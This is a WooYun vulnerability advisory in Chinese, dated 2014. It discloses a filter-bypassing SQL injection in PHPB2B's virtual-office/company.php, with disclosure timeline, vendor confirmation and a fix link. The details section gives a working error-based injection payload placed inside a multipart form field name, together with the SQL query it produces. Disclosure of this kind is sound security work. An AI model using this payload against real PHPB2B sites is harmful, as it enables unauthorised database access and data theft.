当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080675

漏洞标题:PHPB2B注入#1(绕过过滤)

相关厂商:phpb2b.com

漏洞作者: darker

提交时间:2014-10-31 13:00

修复时间:2015-01-29 13:02

公开时间:2015-01-29 13:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-31: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-03: 细节向第三方安全合作伙伴开放
2014-12-25: 细节向核心白帽子及相关领域专家公开
2015-01-04: 细节向普通白帽子公开
2015-01-14: 细节向实习白帽子公开
2015-01-29: 细节向公众公开

简要描述:

PHPB2B某处注入#1。绕过过滤。
官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip
漏洞文件。virtual-office/company.php

详细说明:

POST /phpb2b/virtual-office/company.php
Content-Disposition: form-data; name="data[company][name]"
Content-Disposition: form-data; name="data[company][english_name']"
Content-Disposition: form-data; name="data[company][employee_amount]"
Content-Disposition: form-data; name="data[company][year_annual]"
Content-Disposition: form-data; name="data[company][manage_type]"
Content-Disposition: form-data; name="data[company][property]"
Content-Disposition: form-data; name="data[company][description]"
Content-Disposition: form-data; name="data[company][main_prod]"
Content-Disposition: form-data; name="data[company][address]"
Content-Disposition: form-data; name="data[company][zipcode]"
Content-Disposition: form-data; name="data[company][boss_name]"
Content-Disposition: form-data; name="data[company][reg_address]"
...
...
多个参数存在同样的问题。
data[*][*1] 未经处理。
ex:
Content-Disposition: form-data; name="data[company][employee_amount FROM pb_thk_companyfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#]"
执行:
SELECT name,english_name,employee_amount FROM pb_thk_companyfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#,year_annual,manage_type,property,description,main_prod,address,zipcode,boss_name,reg_address,found_date,reg_fund,bank_from,bank_account,main_brand,main_biz_place,main_customer,link_man,position,mobile,site_url,email,employee_amount,tel,fax,picture,status,industry_id,area_id,modified,cache_membergroupid FROM pb_thk_companies WHERE id='12' AND member_id=3

漏洞证明:

本地测试开启了debug模式。
可延时注入。

p1.jpg


数据库日志。

p2.png

修复方案:

过滤。

版权声明:转载请注明来源 darker@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2014-10-31 22:10

厂商回复:

同时修复:https:///ulinke/phpb2b/commit/a10da72dce459ceecc77b77c14

最新状态:

暂无